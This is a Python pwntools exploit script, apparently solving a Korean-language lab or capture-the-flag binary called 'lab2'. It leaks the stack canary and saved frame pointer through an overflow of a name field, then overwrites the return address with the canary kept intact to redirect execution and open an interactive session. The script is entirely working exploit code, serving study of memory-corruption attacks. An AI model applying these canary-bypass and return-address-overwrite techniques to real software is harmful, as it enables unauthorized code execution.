from pwn import *
def slog(n,m) :
	return success(" : ".join([n,hex(m)]))
	
p=process("./lab2")
p.recvuntil("자퇴 신청\n")
p.sendline(b"1")
payload=b"A"*11
p.sendlineafter("시험 점수를 입력해주세요\n",b"100")
p.recvuntil("이름을 입력해주세요\n")
p.send(payload)
p.recvuntil(payload)
canary=u64(b"\x00"+ p.recv(7))
RBP=u64(p.recv(8))
slog('canary',canary)
slog('rbp',RBP)
p.recvuntil("자퇴 신청\n")
p.sendline(b"1")
p.sendlineafter("시험 점수를 입력해주세요\n",b"100")
p.recvuntil("이름을 입력해주세요\n")
payload=b"A"*10
payload+=p64(canary)
payload+=p64(0x4015c6)
payload+=p64(0x4015c6)
p.send(payload)
slog('canary',canary)
p.recvuntil("자퇴 신청\n")
p.sendline(b"2")
p.sendlineafter("알려주세요 : \n",b"4")
slog('canary',canary)
p.sendlineafter("3. 종료\n",b"2")
slog('canary',canary)
p.sendlineafter("3. 종료\n",b"2")
slog('canary',canary)
p.sendlineafter("3. 종료\n",b"2")
slog('canary',canary)
p.sendlineafter("3. 종료\n",b"2")
slog('canary',canary)
p.sendlineafter("3. 종료\n",b"2")
slog('canary',canary)
p.sendlineafter("3. 종료\n",b"2")
slog('canary',canary)
p.sendlineafter("3. 종료\n",b"3")
slog('canary',canary)
payload=b"y"
payload+=b"\x00"
payload+=b"A"*2
payload+=p64(canary)
payload+=b"B"*8
payload+=p64(0x401296)
p.recvuntil(" (y/n)\n")
p.sendline(b"y")
pause()
p.sendline(payload)
p.interactive()
